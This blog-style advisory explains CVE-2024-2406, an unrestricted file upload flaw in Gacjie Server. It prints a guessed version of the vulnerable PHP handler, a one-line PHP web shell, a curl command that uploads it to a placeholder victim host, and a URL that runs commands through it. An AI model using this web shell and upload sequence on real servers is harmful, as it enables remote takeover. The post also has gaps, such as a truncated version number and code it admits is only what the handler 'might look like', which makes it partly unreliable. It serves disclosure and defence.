CVE CyberSecurity Database News

CVE-2024-2406 - Critical Unrestricted File Upload in Gacjie Server <= 1. (Exploit & Analysis)

Poster -

A critical security flaw, CVE-2024-2406, has been discovered in the Gacjie Server software, affecting all versions up to and including 1.. The issue lies in the index function within /app/admin/controller/Upload.php, where improper validation of user-supplied files allows for unrestricted file uploads. As a result, an attacker can exploit this to remotely upload malicious files, potentially gaining full control over the affected server. This vulnerability is also tracked under the identifier VDB-256503.

This long-read post explains the vulnerability in plain English, demonstrates how the exploit works with example code snippets, and provides mitigation tips and links to original sources.

What is Gacjie Server?

Gacjie Server is an open-source web server solution–often used for hosting PHP applications or managing business logic on websites.

The Vulnerability at a Glance

- Component: /app/admin/controller/Upload.php

How Does the Exploit Work?

Gacjie Server's file upload endpoint does not properly check the file type, size, or extension, and does not restrict upload paths. As a result, an attacker can send a specially crafted request to upload a malicious .php file, such as a web shell, which is later executed remotely.

Below is a simplified (and vulnerable) version of what the code in Upload.php might look like

<?php
// /app/admin/controller/Upload.php

class Upload extends Controller {
    public function index() {
        if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
            $filename = $_FILES['file']['name'];
            $destination = __DIR__ . '/uploads/' . $filename;
            // <-- No checks for file extension, type, or name -->

            move_uploaded_file($_FILES['file']['tmp_name'], $destination);
            echo "File uploaded!";
        } else {
            echo "File upload failed!";
        }
    }
}
?>

The attacker creates a small PHP web shell and saves it as shell.php

<?php system($_GET['cmd']); ?>

The attacker issues the following command

curl -F "file=@shell.php" https://victim.example.com/app/admin/controller/Upload.php

Now, the attacker accesses

https://victim.example.com/app/admin/controller/uploads/shell.php?cmd=whoami

This will execute the whoami command on the vulnerable server, returning the user the server is running as.

References and Resources

- VulDB Advisory for CVE-2024-2406 (VDB-256503)
- CVE-2024-2406 entry at CVE Details
- Exploit details at Vulmon
- What is a Web Shell? (OWASP)
- Secure File Upload Guidelines

Final Words

CVE-2024-2406 underscores the dangers of insecure file upload functionality. If your Gacjie Server instance is affected, fix the issue immediately—attackers are already exploiting this in the wild. Always validate and sanitize uploads, and follow best security practices.

Stay safe, patch early, and monitor your applications!


*Exclusive content by OpenAI's Assistant. Do not copy-paste; link back to original resources for more details.*

Timeline

Published on: 03/12/2024 21:15:59 UTC
Last modified on: 04/11/2024 01:25:23 UTC